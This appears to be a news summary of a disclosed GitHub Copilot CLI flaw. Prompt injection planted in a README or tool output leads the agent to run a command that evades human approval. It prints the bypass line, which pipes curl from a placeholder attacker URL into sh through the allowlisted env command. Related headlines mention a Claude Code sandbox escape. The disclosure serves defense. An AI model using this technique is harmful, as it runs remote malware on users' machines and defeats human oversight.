GitHub Copilot CLI vulnerability allows malware execution via prompt injection
Vulnerability Overview
GitHub Copilot CLI contains vulnerabilities that expose users to arbitrary shell command execution via indirect prompt injection without user approval. Malware can be downloaded from external servers and executed with no user interaction beyond the initial query to the Copilot CLI.
How the Attack Works
The attack chain involves:
- User queries GitHub Copilot CLI while exploring an open-source repository
- Copilot encounters prompt injection stored in a README file from the cloned repository (or other vectors like web search results, MCP tool call results, terminal command output)
- The malicious command bypasses human-in-the-loop approval systems
Bypassing Protection Mechanisms
GitHub Copilot uses a human-in-the-loop approval system that requires user consent before potentially harmful commands execute. This system is triggered unless:
- The user has explicitly configured the command to execute automatically
- The command is part of a hard-coded 'read-only' list found in the source code
External URL access checks require user approval for commands like curl, wget, or Copilot's built-in web-fetch tool. However, attackers can bypass these protections using:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shThe env command is on the hard-coded read-only list, so it executes automatically without approval. Since curl and sh are passed as arguments to env, they're incorrectly parsed and not identified by the validator as subcommands. This bypasses URL permission checks that depend on detecting commands like curl.
GitHub's Response
GitHub responded: "We have reviewed your report and validated your findings. After internally assessing the finding, we have determined that it is a known issue that does not present a significant security risk. We may make this functionality more strict in the future, but we don't have anything to announce right now."
Scope and Limitations
The command parsing vulnerabilities described are macOS-specific. However, GitHub Copilot exhibits additional vulnerabilities including both operating-system-agnostic risks and Windows-specific risks. Other command parsing vulnerabilities allow arbitrary file reading and writing.
📖 Read the full source: HN LLM Tools
👀 See Also
llm-hasher: Local PII Detection and Tokenization for Hybrid LLM Workflows
llm-hasher is a tool that detects personally identifiable information locally using Ollama before data reaches external LLMs like OpenAI or Claude, tokenizes the PII, and restores originals after processing. It uses regex for structured data types and a local LLM for contextual detection, with encrypted storage for mappings.
Claude's Conversation Search Tool Still Returns Deleted Chats
A Claude Pro user discovered that deleted conversations remain retrievable through Claude's conversation search tool, returning substantive content including titles, message counts, and excerpts despite the chat links being dead.
Claude Code CVE-2026-39861: Sandbox Escape via Symlink Following
A high-severity vulnerability in Claude Code's sandbox allows arbitrary file write outside the workspace via symlink following, potentially leading to code execution.
Claude Code source code reportedly leaked via NPM map file
A tweet reports that Claude Code's source code has been leaked through a map file in their NPM registry. The HN discussion has 93 points and 35 comments.